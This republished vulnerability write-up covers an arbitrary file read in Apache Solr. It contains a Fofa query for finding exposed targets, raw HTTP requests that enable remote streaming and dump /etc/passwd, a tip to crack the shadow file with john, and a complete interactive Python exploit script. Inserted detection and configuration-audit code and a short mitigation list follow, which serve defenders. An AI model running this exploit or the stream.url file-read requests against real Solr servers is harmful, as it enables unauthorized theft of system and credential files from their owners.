
Web Security: Analysis of the Arbitrary File Read Vulnerability in All Versions of Apache Solr

2025-04-06 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

This article analyzes the arbitrary file read vulnerability that affects all versions of Apache Solr: what it is, how to reproduce it in a test environment, and how to mitigate it.

0x01 Vulnerability description

All versions of Apache Solr are affected by an arbitrary file read vulnerability, which allows an attacker to obtain sensitive files from the target system without authorization.

0x02 Affected versions

All versions

0x03 Vulnerability reproduction

Fofa search query: app="Solr" || app="Apache-Solr"

Environment configuration

Download Solr and extract it:

https://solr.apache.org/downloads.html  # Solr download page

Go to the bin directory of Solr and run:

./solr start

Visit the following URL; if the Solr admin page loads, the startup was successful.

http://192.168.153.7:8983

The Solr instance started this way does not yet have a core for indexing and searching.

./solr create -c <core_name>  # creates a core in data-driven mode

Vulnerability reproduction

Visit the URL:

http://192.168.153.7:8983/solr/admin/cores?indexInfo=false&wt=json

The request as captured in Burp:

GET /solr/admin/cores?indexInfo=false&wt=json HTTP/1.1
Host: 192.168.153.7:8983
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Then use Burp to send a POST request to the core's Config API:

POST /solr/henry/config HTTP/1.1
Host: 192.168.153.7:8983
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 84

{"set-property": {"requestDispatcher.requestParsers.enableRemoteStreaming": true}}

If the response contains "This response format is experimental. It is likely to change in the future.", the vulnerability is present.

To read the file:

POST /solr/henry/debug/dump?param=ContentStreams HTTP/1.1
Host: 192.168.153.7:8983
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 35
Content-Type: application/x-www-form-urlencoded

stream.url=file:///etc/passwd
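For detection, the request sequence above leaves a recognizable trail in the HTTP access log even though the stream.url value travels in the POST body. The following added example (not part of the original article) flags a Config API POST followed by a ContentStreams dump from the same client, plus any stream.url or stream.file parameter visible in a query string. The NCSA log format, the client addresses and the sample lines are assumptions constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in NCSA access-log format (not taken from the page).
SAMPLE_LOG = """\
192.0.2.10 - - [06/Apr/2025:10:00:01 +0000] "GET /solr/admin/cores?indexInfo=false&wt=json HTTP/1.1" 200 512
192.0.2.10 - - [06/Apr/2025:10:00:02 +0000] "POST /solr/henry/config HTTP/1.1" 200 190
192.0.2.10 - - [06/Apr/2025:10:00:03 +0000] "POST /solr/henry/debug/dump?param=ContentStreams HTTP/1.1" 200 2048
198.51.100.7 - - [06/Apr/2025:10:05:00 +0000] "GET /solr/henry/select?q=*:* HTTP/1.1" 200 900
198.51.100.7 - - [06/Apr/2025:10:06:00 +0000] "GET /solr/henry/debug/dump?stream.url=file:///etc/hosts HTTP/1.1" 200 300
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
CONFIG_RE = re.compile(r"^/solr/([^/]+)/config$")
DUMP_RE = re.compile(r"^/solr/([^/]+)/debug/dump$")

def find_suspicious(log_text):
    """Return sorted (client, core, reason) tuples for the request pattern on this page."""
    config_writes = defaultdict(set)  # client -> cores whose Config API it POSTed to
    findings = set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, method, target, _status = m.groups()
        url = urlsplit(target)
        params = parse_qs(url.query)
        cfg, dump = CONFIG_RE.match(url.path), DUMP_RE.match(url.path)
        if cfg and method == "POST":
            config_writes[client].add(cfg.group(1))
        elif dump:
            core = dump.group(1)
            # Remote-streaming parameters visible in the query string.
            if any(k in params for k in ("stream.url", "stream.file")):
                findings.add((client, core, "stream-param"))
            # Config write followed by a ContentStreams dump from the same client.
            if "ContentStreams" in params.get("param", []) and core in config_writes[client]:
                findings.add((client, core, "config-then-dump"))
    return sorted(findings)

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG):
        print(finding)
```

A Config API write is also legitimate admin activity, so treat "config-then-dump" as a lead to review against known administrator addresses rather than as proof of compromise.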

You can also read the shadow file and use john to crack the passwords:

POC script:

Master PeiQi, eternal God!

# coding=utf-8
# Apache Solr all versions arbitrary file read
# Fofa: app="Apache-Solr" || app="Solr"
import requests
import json
import sys
import time

def title():
    print("+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+")
    print("+~~~ Apache Solr all versions arbitrary file read ~~~+")
    print("+~~~ Use: python3 solr.py ~~~+")
    print("+~~~ url: http://x.x.x.x:port ~~~+")
    print("+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+")
    time.sleep(2)

def get_name(url):
    url_1 = url + "/solr/admin/cores?indexInfo=false&wt=json"
    try:
        res = requests.get(url=url_1)
        # Convert the JSON data into a Python dictionary and take the first core name
        name = str(list(json.loads(res.text)["status"])[0])
        print("[!] Got the target system name: \033[31m%s\033[0m " % name + "[0] " + "URL: " + url + "/solr/" + name + "/config")
        return name
    except Exception as e:
        print("[!] The target URL cannot be exploited.", e)
        sys.exit(0)

def check_vul(url, name):
    url_2 = url + "/solr/" + name + "/config"
    data = '{"set-property": {"requestDispatcher.requestParsers.enableRemoteStreaming": true}}'
    try:
        res = requests.post(url=url_2, data=data)
        if "This response format" in res.text and res.status_code == 200:
            print("[!] \033[31mTarget system is vulnerable\033[0m")
        else:
            print("[!] Target system is not vulnerable")
            sys.exit(0)
    except Exception as e:
        print("[!] Target system request failed")
        sys.exit(0)

def read_files(url, name, file_name):
    url = url + "/solr/" + name + "/debug/dump?param=ContentStreams"
    # Content-Type must be set here, otherwise the file cannot be read
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    data = "stream.url=file://{}".format(file_name)
    try:
        res = requests.post(url=url, headers=headers, data=data)
        if "No such file or directory" in res.text:
            print("[!] The target system failed to read the file!")
            sys.exit(0)
        else:
            print("Reading file...")
            content = json.loads(res.text)["streams"][0]["stream"]
            print("[o] The file contents are as follows:\n\033[34m{}\033[0m".format(content))
    except Exception as e:
        print("[!] ", e)
        sys.exit(0)

if __name__ == "__main__":
    title()
    url = str(input("\n[!] Enter the target system URL: "))
    name = get_name(url)
    check_vul(url, name)
    file_name = str(input("[!] Please enter the file to read: "))
    read_files(url, name, file_name)

0x04 Remediation recommendations

Because the vendor has not fixed the vulnerability, there is currently no secure version.

1. Enable authentication / authorization

2. Configure firewall policies so that the Solr API (including the Admin UI) is accessible only to trusted IPs and users

3. Do not expose Apache Solr to the public network.
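To verify the first recommendation on an existing deployment, the following added example (not part of the original article) audits two Solr files: the core's configoverlay.json, where a Config API set-property call such as the one shown earlier is persisted, and security.json. The sample file contents are constructed, and requiring blockUnknown to be set explicitly is a policy assumption of this example.

```python
import json

# Constructed sample file contents (assumptions for this example, not from the page).
OVERLAY_AFTER_ATTACK = '{"props": {"requestDispatcher": {"requestParsers": {"enableRemoteStreaming": true}}}}'
SECURITY_WEAK = '{"authentication": {"class": "solr.BasicAuthPlugin", "blockUnknown": false}}'
SECURITY_OK = json.dumps({
    "authentication": {"class": "solr.BasicAuthPlugin", "blockUnknown": True},
    "authorization": {"class": "solr.RuleBasedAuthorizationPlugin",
                      "permissions": [{"name": "config-edit", "role": "admin"},
                                      {"name": "all", "role": "admin"}]},
})

def audit(overlay_text, security_text):
    """Return findings for one core's configoverlay.json and the security.json text."""
    findings = []
    overlay = json.loads(overlay_text) if overlay_text else {}
    parsers = overlay.get("props", {}).get("requestDispatcher", {}).get("requestParsers", {})
    if parsers.get("enableRemoteStreaming") is True:
        findings.append("remote streaming enabled via Config API overlay")
    security = json.loads(security_text) if security_text else {}
    authn, authz = security.get("authentication"), security.get("authorization")
    if not authn:
        findings.append("no authentication plugin configured")
    elif authn.get("blockUnknown") is not True:
        # Assumption of this example: the setting must be explicit.
        findings.append("blockUnknown is not true: unauthenticated requests are allowed")
    if not authz:
        findings.append("no authorization plugin configured")
    elif not any(p.get("name") in ("config-edit", "all") and p.get("role")
                 for p in authz.get("permissions", [])):
        findings.append("Config API edits (config-edit) are not restricted to a role")
    return findings

if __name__ == "__main__":
    for finding in audit(OVERLAY_AFTER_ATTACK, SECURITY_WEAK):
        print("[finding]", finding)
```

An enableRemoteStreaming entry in the overlay that no administrator set is worth treating as an indicator that the Config API was reachable by an untrusted client.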
